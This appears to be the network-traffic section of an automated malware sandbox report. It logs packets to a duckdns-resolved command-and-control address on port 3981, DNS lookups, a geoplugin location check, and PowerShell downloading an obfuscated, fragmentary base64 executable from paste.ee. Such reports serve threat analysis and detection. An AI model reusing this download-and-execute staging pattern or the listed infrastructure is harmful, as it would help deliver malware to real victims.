                                                    Oct 7, 2024 07:09:29.726150036 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.726161957 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.726176977 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.726352930 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.730840921 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.730856895 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.730880022 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.730895996 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.730909109 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.730918884 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.730948925 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.735624075 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.735640049 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.735683918 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.740386009 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.740401983 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.740417004 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.740439892 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.740441084 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.740458965 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.740479946 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.740509987 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.745323896 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.745341063 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.745356083 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.745369911 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.745383978 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.745398998 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.745404959 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.745412111 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.745441914 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.745461941 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.745501995 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.745520115 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.745542049 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.745557070 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:29.745573044 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.745594978 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:29.941303968 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:30.032644033 CEST44349813104.20.4.235192.168.2.5
                                                    Oct 7, 2024 07:09:30.032805920 CEST49813443192.168.2.5104.20.4.235
                                                    Oct 7, 2024 07:09:30.034013987 CEST49813443192.168.2.5104.20.4.235
                                                    Oct 7, 2024 07:09:30.034018993 CEST44349813104.20.4.235192.168.2.5
                                                    Oct 7, 2024 07:09:30.034262896 CEST44349813104.20.4.235192.168.2.5
                                                    Oct 7, 2024 07:09:30.041011095 CEST49813443192.168.2.5104.20.4.235
                                                    Oct 7, 2024 07:09:30.083426952 CEST44349813104.20.4.235192.168.2.5
                                                    Oct 7, 2024 07:09:30.173341990 CEST44349813104.20.4.235192.168.2.5
                                                    Oct 7, 2024 07:09:30.173413992 CEST44349813104.20.4.235192.168.2.5
                                                    Oct 7, 2024 07:09:30.173505068 CEST49813443192.168.2.5104.20.4.235
                                                    Oct 7, 2024 07:09:30.174438953 CEST49813443192.168.2.5104.20.4.235
                                                    Oct 7, 2024 07:09:30.288563013 CEST8049807178.237.33.50192.168.2.5
                                                    Oct 7, 2024 07:09:30.288629055 CEST4980780192.168.2.5178.237.33.50
                                                    Oct 7, 2024 07:09:31.888843060 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:31.894969940 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:31.895005941 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:31.895035028 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:31.895039082 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:31.895083904 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:31.895095110 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:31.895096064 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:31.895111084 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:31.895138025 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:31.895164013 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:31.895190954 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:31.895257950 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:31.895304918 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:31.901036978 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:31.901181936 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:31.901209116 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:31.901236057 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:31.901324034 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:31.901489019 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:31.901797056 CEST398149801172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:31.901858091 CEST498013981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:50.222721100 CEST398149790172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:50.237006903 CEST497903981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:50.242007971 CEST398149790172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:59.166507006 CEST398149790172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:59.193773031 CEST499753981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:59.198844910 CEST398149975172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:59.199083090 CEST499753981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:59.202289104 CEST499753981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:59.207108974 CEST398149975172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:59.237756014 CEST497903981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:59.314021111 CEST398149790172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:59.337069035 CEST499773981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:59.342103004 CEST398149977172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:59.342186928 CEST499773981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:59.345189095 CEST499773981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:59.350086927 CEST398149977172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:59.425267935 CEST497903981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:59.874087095 CEST398149975172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:09:59.925257921 CEST499753981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:09:59.989176989 CEST398149977172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:10:00.021656990 CEST398149975172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:10:00.025840998 CEST499753981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:10:00.030685902 CEST398149975172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:10:00.030760050 CEST499753981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:10:00.034631014 CEST499773981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:10:00.440876007 CEST499753981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:10:01.072143078 CEST398149977172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:10:01.072185993 CEST398149977172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:10:01.072256088 CEST499773981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:10:01.072432995 CEST398149977172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:10:01.072683096 CEST398149977172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:10:01.072736979 CEST499773981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:10:01.073060989 CEST499773981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:10:01.073331118 CEST398149975172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:10:01.073360920 CEST398149975172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:10:01.073415041 CEST499753981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:10:01.078305960 CEST499773981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:10:01.082618952 CEST398149975172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:10:01.083133936 CEST398149977172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:10:01.083189964 CEST499773981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:10:01.088078022 CEST398149977172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:10:01.088135958 CEST499773981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:10:01.092981100 CEST398149977172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:10:01.134598017 CEST499773981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:10:01.139544010 CEST398149977172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:10:01.139595985 CEST398149977172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:10:01.139619112 CEST499773981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:10:01.139624119 CEST398149977172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:10:01.139678955 CEST499773981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:10:01.139678955 CEST499773981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:10:01.139699936 CEST398149977172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:10:01.139728069 CEST398149977172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:10:01.139755011 CEST499773981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:10:01.139755964 CEST398149977172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:10:01.139770031 CEST499773981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:10:01.139784098 CEST398149977172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:10:01.139800072 CEST499773981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:10:01.139811039 CEST398149977172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:10:01.139842987 CEST398149977172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:10:01.139869928 CEST398149977172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:10:01.144475937 CEST398149977172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:10:01.144504070 CEST398149977172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:10:01.144767046 CEST398149977172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:10:01.144798040 CEST398149977172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:10:01.144831896 CEST398149977172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:10:01.145005941 CEST398149977172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:10:01.145035982 CEST398149977172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:10:01.145064116 CEST398149977172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:10:01.402043104 CEST398149975172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:10:01.402120113 CEST499753981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:10:02.194843054 CEST499753981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:10:02.199909925 CEST398149975172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:10:20.254755974 CEST398149790172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:10:20.262227058 CEST497903981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:10:20.267100096 CEST398149790172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:10:21.548963070 CEST398149790172.111.244.100192.168.2.5
                                                    Oct 7, 2024 07:10:21.737576008 CEST497903981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:10:26.681467056 CEST497903981192.168.2.5172.111.244.100
                                                    Oct 7, 2024 07:10:26.682482958 CEST4980780192.168.2.5178.237.33.50
                                                    Oct 7, 2024 07:10:26.682971001 CEST499773981192.168.2.5172.111.244.100
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Oct 7, 2024 07:08:59.304733038 CEST5556653192.168.2.51.1.1.1
                                                    Oct 7, 2024 07:08:59.863856077 CEST53555661.1.1.1192.168.2.5
                                                    Oct 7, 2024 07:09:02.445939064 CEST6006053192.168.2.51.1.1.1
                                                    Oct 7, 2024 07:09:02.454744101 CEST53600601.1.1.1192.168.2.5
                                                    Oct 7, 2024 07:09:09.268434048 CEST6375953192.168.2.51.1.1.1
                                                    Oct 7, 2024 07:09:09.331513882 CEST53637591.1.1.1192.168.2.5
                                                    Oct 7, 2024 07:09:15.344393969 CEST6036153192.168.2.51.1.1.1
                                                    Oct 7, 2024 07:09:15.351592064 CEST53603611.1.1.1192.168.2.5
                                                    Oct 7, 2024 07:09:16.503025055 CEST5436653192.168.2.51.1.1.1
                                                    Oct 7, 2024 07:09:16.619688034 CEST53543661.1.1.1192.168.2.5
                                                    Oct 7, 2024 07:09:26.329693079 CEST6307753192.168.2.51.1.1.1
                                                    Oct 7, 2024 07:09:26.460963964 CEST53630771.1.1.1192.168.2.5
                                                    Oct 7, 2024 07:09:28.652652025 CEST5809253192.168.2.51.1.1.1
                                                    Oct 7, 2024 07:09:28.659702063 CEST53580921.1.1.1192.168.2.5
                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Oct 7, 2024 07:08:59.304733038 CEST192.168.2.51.1.1.10xed12Standard query (0)ftp.desckvbrat.com.brA (IP address)IN (0x0001)false
                                                    Oct 7, 2024 07:09:02.445939064 CEST192.168.2.51.1.1.10x7a25Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                    Oct 7, 2024 07:09:09.268434048 CEST192.168.2.51.1.1.10xafbaStandard query (0)simonastolerciuc.roA (IP address)IN (0x0001)false
                                                    Oct 7, 2024 07:09:15.344393969 CEST192.168.2.51.1.1.10xd8daStandard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                    Oct 7, 2024 07:09:16.503025055 CEST192.168.2.51.1.1.10x255dStandard query (0)janbours92harbu03.duckdns.orgA (IP address)IN (0x0001)false
                                                    Oct 7, 2024 07:09:26.329693079 CEST192.168.2.51.1.1.10x9aebStandard query (0)janbours92harbu04.duckdns.orgA (IP address)IN (0x0001)false
                                                    Oct 7, 2024 07:09:28.652652025 CEST192.168.2.51.1.1.10xd0ecStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Oct 7, 2024 07:08:59.863856077 CEST1.1.1.1192.168.2.50xed12No error (0)ftp.desckvbrat.com.brdesckvbrat.com.brCNAME (Canonical name)IN (0x0001)false
                                                    Oct 7, 2024 07:08:59.863856077 CEST1.1.1.1192.168.2.50xed12No error (0)desckvbrat.com.br191.252.83.213A (IP address)IN (0x0001)false
                                                    Oct 7, 2024 07:09:02.454744101 CEST1.1.1.1192.168.2.50x7a25No error (0)paste.ee188.114.96.3A (IP address)IN (0x0001)false
                                                    Oct 7, 2024 07:09:02.454744101 CEST1.1.1.1192.168.2.50x7a25No error (0)paste.ee188.114.97.3A (IP address)IN (0x0001)false
                                                    Oct 7, 2024 07:09:09.331513882 CEST1.1.1.1192.168.2.50xafbaNo error (0)simonastolerciuc.ro85.120.16.93A (IP address)IN (0x0001)false
                                                    Oct 7, 2024 07:09:15.351592064 CEST1.1.1.1192.168.2.50xd8daNo error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                    Oct 7, 2024 07:09:15.351592064 CEST1.1.1.1192.168.2.50xd8daNo error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                    Oct 7, 2024 07:09:15.351592064 CEST1.1.1.1192.168.2.50xd8daNo error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                    Oct 7, 2024 07:09:16.619688034 CEST1.1.1.1192.168.2.50x255dNo error (0)janbours92harbu03.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                                    Oct 7, 2024 07:09:26.460963964 CEST1.1.1.1192.168.2.50x9aebNo error (0)janbours92harbu04.duckdns.org172.111.244.100A (IP address)IN (0x0001)false
                                                    Oct 7, 2024 07:09:28.659702063 CEST1.1.1.1192.168.2.50xd0ecNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                    • paste.ee
                                                    • simonastolerciuc.ro
                                                    • pastebin.com
                                                    • geoplugin.net
                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.549807178.237.33.50807784C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 7, 2024 07:09:28.668906927 CEST71OUTGET /json.gp HTTP/1.1
                                                    Host: geoplugin.net
                                                    Cache-Control: no-cache
                                                    Oct 7, 2024 07:09:29.288644075 CEST1170INHTTP/1.1 200 OK
                                                    date: Mon, 07 Oct 2024 05:09:29 GMT
                                                    server: Apache
                                                    content-length: 962
                                                    content-type: application/json; charset=utf-8
                                                    cache-control: public, max-age=300
                                                    access-control-allow-origin: *
                                                    Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 30 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                    Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.549706188.114.96.34433200C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-07 05:09:02 UTC67OUTGET /d/9xfVr/0 HTTP/1.1
                                                    Host: paste.ee
                                                    Connection: Keep-Alive
                                                    2024-10-07 05:09:03 UTC1236INHTTP/1.1 200 OK
                                                    Date: Mon, 07 Oct 2024 05:09:03 GMT
                                                    Content-Type: text/plain; charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Cache-Control: max-age=2592000
                                                    strict-transport-security: max-age=63072000
                                                    x-frame-options: DENY
                                                    x-content-type-options: nosniff
                                                    x-xss-protection: 1; mode=block
                                                    content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B7ixCYLSm3u32BOPUzgII9hFF3HPW%2FHG8vqU%2FNdSgQtYi3TNj1918ycGJAVr9IjAkZgo8DJT3O6YOc5hTVgom%2FkeHTpNShVbWqQTJjmFHedyqkd0g6U9kiZZ4A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8ceb60760e94424a-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-10-07 05:09:03 UTC133INData Raw: 31 66 37 66 0d 0a 54 56 71 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 2f 2f 38 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4c 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a
                                                    Data Ascii: 1f7fTVqQ::M::::E:::://8::Lg:::::
                                                    2024-10-07 05:09:03 UTC1369INData Raw: e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86
                                                    Data Ascii: ::::Q::::::::::::::::::::::::::::::::
                                                    2024-10-07 05:09:03 UTC1369INData Raw: e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4c 78 4c e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 50 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 67 44 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a
                                                    Data Ascii: ::B:::::::::::::::LxL::BP:::::G:::GgD::::::::
                                                    2024-10-07 05:09:03 UTC1369INData Raw: 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 e2 86 93 3a e2 86 93 75 63 6e 4e 79 59 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 67 44 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 59 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2
                                                    Data Ascii: ::G:ucnNyYw:::GgD::::Y:::::Q::::w:::::::::::::::
                                                    2024-10-07 05:09:03 UTC1369INData Raw: 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 71 48 67 49 6f 47 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 69 71 6d 63 78 6b e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 71 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 48 4d 61 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 67 e2 86 93 3a e2 86 93 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 52 7a 47 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 6f e2 86 93 3a e2 86 93 44 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 63 78 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 71 e2 86 93 3a e2 86 93 42 e2 86 93 3a e2 86 93 e2 86 93
                                                    Data Ascii: :::oqHgIoG:::Ciqmcxk:::q::Q::BHMa:::Kg:I:::RzGw::Co:D:::Ecxw:::q:B:
